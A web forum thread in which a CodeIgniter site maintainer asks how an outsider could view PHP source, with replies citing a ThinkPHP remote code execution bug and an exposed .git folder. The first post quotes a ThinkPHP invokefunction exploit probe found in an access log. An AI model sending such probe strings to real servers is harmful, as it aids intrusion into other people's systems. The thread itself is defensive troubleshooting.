Welcome Guest, Not a member yet? Register   Sign In
security vulnerability - being able to see your PHP FILE CODE?
#1
Shocked 
(This post was last modified: 08-05-2020, 05:35 AM by shez1983.)

so i recieved an email - from someone who seems a good/ethical hacker..

he has given screenshot of the code (Controller file) he could see.. 

so i joined the company who were using CI3... I am not a hacker or have that expertise so have been looking at access logs to see any funny urls being accessed and i found few but when i pasted them in the browser it was all ok i got a forbidden error..

I have also looked at the CI3 vulnerability lists/exploits but there wasnt an example of how the exploit works (I found two related to my problem ie viewing php files)... not sure what the next steps are?

the enable query config is set to false..

in the access log the one funky url i found is this:
"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1"

but i tried it by adding it to end of my domain but no luck..

SO one thing i found was .git folder was accessible.. not sure if that is what it was? so if anyone still knows of a way to see php code via CI3 ie domain.com/index.php?sss....
so i can be sure
Reply
#2

Well guess what I through that line into Google Search and this is what came back.

THINKPHP REMOTE CODE EXECUTION BUG IS ACTIVELY BEING EXPLOITED
What did you Try? What did you Get? What did you Expect?

Joined CodeIgniter Community 2009.  ( Skype: insitfx )
Reply
#3

i dont have thinkPHP installed.. that was the only 'suspicious' url in access log.. which i mentioned i tried and got a forbidden error.. so clearly someone thought i had thinkPHP or w/e but i dont..
Reply
#4

Do you have an upload function on your website? Maybe he uploaded an injected PHP file and got access to your files that way.
If you can't see the PHP code from accessing e.g. /application/controllers/Pages.php your Apache/Nginx are configured correctly.

If he could download all files in your .git folder, that means he got all your source code. Here you can find an article about it:
https://medium.com/swlh/hacking-git-dire...e60fa79a36

Accessing php-files from index.php? depends on how your application where developed and what version of CodeIgniter you got. CI 3.1.3 have some nasty bugs.
https://codeigniter.com/userguide3/chang...sion-3-1-3
Reply




Theme © iAndrew 2016 - Forum software by © MyBB